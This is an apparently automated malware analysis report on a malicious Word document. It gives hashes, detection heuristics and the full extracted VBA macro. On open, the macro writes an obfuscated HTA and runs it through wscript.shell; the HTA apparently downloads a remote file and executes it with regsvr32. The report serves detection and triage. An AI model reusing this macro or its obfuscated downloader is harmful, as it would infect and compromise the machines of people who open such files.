Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1c68d22c6bc13f93…

MALICIOUS

Office (OOXML)

79.3 KB Created: 2021-03-26 06:35:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: 4e91f49255a95147af37e9f94e1227aa SHA-1: b4371d072e4987277e5ce0c3beb728a825c29d49 SHA-256: 1c68d22c6bc13f93b932ca0aed9e7e2a25415fcead97f737f46dd271b4ecdb20
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set swapTableValue = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set swapTableValue = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8476 bytes
SHA-256: 2d801515ad3dde5ed9a1ef0dddab5db3acce2822e36e7f143b0e770d53a481f7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{8FDAA71E-455C-4A67-9E6B-7123817453B5}{1DE5C790-E9E6-4B6B-B9D0-B62F628C03F0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function variableReferenceMain()
variableReferenceMain = frm.cbtn1.Tag
End Function
Function buttonException()
buttonException = frm.cbtn1.Caption
End Function
Public Sub cbtn1_Click()
Set swapTableValue = CreateObject("wscript.shell")
swapTableValue.exec Replace(variableReferenceMain, "1", "") & " " & Replace(buttonException, "1", "")
End Sub


Attribute VB_Name = "borderCount"
Sub autoopen()
queryGlobalBuffer
End Sub
Function tr(documentCounterClass)
tr = documentCounterClass
End Function
Sub queryGlobalBuffer()
Dim loadCopy As String
loadCopy = Replace(frm.cbtn1.Caption, "1", "")
Set procWindowPaste = New listTempStorage
procWindowPaste.repoDocumentTemp loadCopy, convertTitle
frm.cbtn1_Click
End Sub

Attribute VB_Name = "loadBorder"
Function variableRepoA()
variableRepoA = tr("<div id='content'>fTtlc29sYy5yZWRyb0JuZWVyY1N0c2lsOykyICwiZ3BqLn")
End Function
Function captionPointer()
captionPointer = tr("hlZG5JZXJ1ZGVjb3JwXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm90ZXZhcy5yZW")
End Function
Function exceptionView()
exceptionView = tr("Ryb0JuZWVyY1N0c2lsOyl5ZG9iZXNub3BzZXIucmVkcm9CeXBvYyhldGlydy5yZW")
End Function
Function selectClass()
selectClass = tr("Ryb0JuZWVyY1N0c2lsOzEgPSBlcHl0LnJlZHJvQm5lZXJjU3RzaWw7bmVwby5yZW")
End Function
Function viewView()
viewView = tr("Ryb0JuZWVyY1N0c2lsOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbi")
End Function
Function refExceptionCopy()
refExceptionCopy = tr("A9IHJlZHJvQm5lZXJjU3RzaWwgcmF2eykwMDIgPT0gc3V0YXRzLnJlZHJvQnlwb2")
End Function
Function globalSelect()
globalSelect = tr("MoZmk7KShkbmVzLnJlZHJvQnlwb2M7KWVzbGFmICwiTlExdmlMNm5ZeVFkZGY9cm")
End Function
Function ALocal()
ALocal = tr("VzdSZudm13WWRKVXpmYj1jSXUmaldsYWJqVjRZU2w3UnF0UnRlS2o9NTMxNCYwUX")
End Function
Function sizeRepoDelete()
sizeRepoDelete = tr("pUTlo9S3JFNmdyJlFSRldwZFFabHc5PWhjcmFlcyZnZnVHbHcwNTJyeEF1TVlJbk")
End Function
Function iteratorSwap()
iteratorSwap = tr("9KdFJrPXEmQ2pDR3J0eFE1eWZkbXZnPWhjcmFlcyZDSWszUUU1Wlk9Qm54RjdGej")
End Function
Function tempGeneric()
tempGeneric = tr("83d2FuLzY1MzE2L08vNDAyNjQvbWlmcmV2aUt2UWhmQ2xsSnJ3OXVvL2hueTdwT1")
End Function
Function referenceConst()
referenceConst = tr("k1REJkcGY4aGcybEppaENBRUtSbjBLdTh2MXBuT1MwYTU1ZDBYV3EvZHl1R2JaSG")
End Function
Function loadPtr()
loadPtr = tr("xFRjZmUlhJeERONFRkemRzcWNGU3Y1c2tnODdyWUtIcHAvUVJPYlc3ekVscnc5Y0")
End Function
Function bufWindowRepo()
bufWindowRepo = tr("N6Y2FXN1IvNURBRFN6UTNvL2RkdmRmL21vYy42MTAyLWRsb2hlc3VvaC1yZWJtdW")
End Function
Function namespaceRequest()
namespaceRequest = tr("wvLzpwdHRoIiAsIlRFRyIobmVwby5yZWRyb0J5cG9jOykicHR0aGxteC4ybG14c2")
End Function
Function buttonSwapBorder()
buttonSwapBorder = tr("0iKHRjZWpiT1hldml0Y0Egd2VuID0gcmVkcm9CeXBvYyByYXY=|fXspZXRlbGVEc")
End Function
Function removeResponse()
removeResponse = tr("mV0bnVvYyhoY3RhY307KSJhdGgubmlhbVxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsa")
End Function
Function convertFunc()
convertFunc = tr("WZldGVsZWQuY29yUGRhb0x4RXt5cnQ7KSJ0Y2VqYm9tZXRzeXNlbGlmLmduaXRwa")
End Function
Function copyCount()
copyCount = tr("XJjcyIodGNlamJPWGV2aXRjQSB3ZW4gPSBjb3JQZGFvTHhFIHJhdjspImdwai54Z")
End Function
Function namespaceDeleteStruct()
namespaceDeleteStruct = tr("WRuSWVydWRlY29ycFxcY2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51ci4pI")
End Function
Function ATitleVar()
ATitleVar = tr("mxsZWhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2Vu</div><script languag")
End Function
Function screenAClear()
screenAClear = tr("e='javascript'>function WPointerMem(removeArgument){return(new A")
End Function
Function windowRemove()
windowRemove = tr("ctiveXObject(removeArgument));}function table(){return(documentA")
End Function
Function refTmp()
refTmp = tr("rrayLen('/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJ")
End Function
Function listLocal()
listLocal = tr("IHGFEDCBA'));}function responseDelete(s){var e={}; var i; var b=")
End Function
Function collectionLink()
collectionLink = tr("0; var c; var x; var l=0; var a; var clearClass=''; var w=String")
End Function
Function textResponse()
textResponse = tr(".fromCharCode; var L=s.length;var rightDelete = 'charAt';for(i=0")
End Function
Function mainCountRepo()
mainCountRepo = tr(";i<64;i++){e[table()[rightDelete](i)]=i;}for(x=0;x<L;x++){c=e[s[")
End Function
Function tableVb()
tableVb = tr("rightDelete](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0x")
End Function
Function queryVbDocument()
queryVbDocument = tr("ff)||(x<(L-2)))&&(clearClass+=w(a));}}return(clearClass);};funct")
End Function
Function memButtonProcedure()
memButtonProcedure = tr("ion documentArrayLen(pasteA){return pasteA.split('').reverse().j")
End Function
Function deleteNextReference()
deleteNextReference = tr("oin('');}responseWCollection = window;convertBufDatabase = docum")
End Function
Function ExBufferLib()
ExBufferLib = tr("ent;responseWCollection.resizeTo(1, 1);responseWCollection.moveT")
End Function
Function textRemoveValue()
textRemoveValue = tr("o(-100, -100);var valueDocumentVariable = convertBufDatabase.get")
End Function
Function pasteCaption()
pasteCaption = tr("ElementById('content').innerHTML;var valueDocumentVariable = val")
End Function
Function buttonMemory()
buttonMemory = tr("ueDocumentVariable.split('|');var countArgumentIndex = documentA")
End Function
Function globalLen()
globalLen = tr("rrayLen(responseDelete(valueDocumentVariable[0]));var libConvert")
End Function
Function vbFuncClass()
vbFuncClass = tr(" = documentArrayLen(responseDelete(valueDocumentVariable[1]));</")
End Function
Function AProcedure()
AProcedure = tr("script><script language='javascript'>function captionVarPointer(")
End Function
Function ptrLenVb()
ptrLenVb = tr("optionScreen){var referenceSwapA = WPointerMem('msscriptcontrol.")
End Function
Function databaseLoadCounter()
databaseLoadCounter = tr("scriptcontrol');referenceSwapA.Language = 'jscript';referenceSwa")
End Function
Function tableCollection()
tableCollection = tr("pA.Timeout = 60000;referenceSwapA.AddCode(optionScreen);return(n")
End Function
Function textboxTempMem()
textboxTempMem = tr("ull);}</script><script language='vbscript'>captionVarPointer cou")
End Function
Function removeLenRequest()
removeLenRequest = tr("ntArgumentIndex : captionVarPointer libConvert : responseWCollec")
End Function
Function vbPtr()
vbPtr = tr("tion.close</script></body></html>")
End Function
Function convertTitle()
convertTitle = variableRepoA + captionPointer + exceptionView + selectClass + viewView + refExceptionCopy + globalSelect + ALocal + sizeRepoDelete + iteratorSwap + tempGeneric + referenceConst + loadPtr + bufWindowRepo + namespaceRequest + buttonSwapBorder + removeResponse + convertFunc + copyCount + namespaceDeleteStruct + ATitleVar + screenAClear + windowRemove + refTmp + listLocal + collectionLink + textResponse + mainCountRepo + tableVb + queryVbDocument + memButtonProcedure + deleteNextReference + ExBufferLib + textRemoveValue + pasteCaption + buttonMemory + globalLen + vbFuncClass + AProcedure + ptrLenVb + databaseLoadCounter + tableCollection + textboxTempMem + removeLenRequest + vbPtr
End Function

Attribute VB_Name = "listTempStorage"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub repoDocumentTemp(tableTemp As String, loadTrustMem As String)
Dim tmpLeftNext As FileSystemObject
Set tmpLeftNext = New FileSystemObject
Dim vbRemove As TextStream
Set vbRemove = tmpLeftNext.CreateTextFile(tableTemp)
vbRemove.WriteLine loadTrustMem
vbRemove.Close
Set vbRemove = Nothing
Set tmpLeftNext = Nothing
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 37376 bytes
SHA-256: cf007fd3f35e7ae2287e4b122536f721fe1ece121b76cd0d4d1b8b6241c26593

Open this report in the interactive analyzer, or submit your own file for analysis.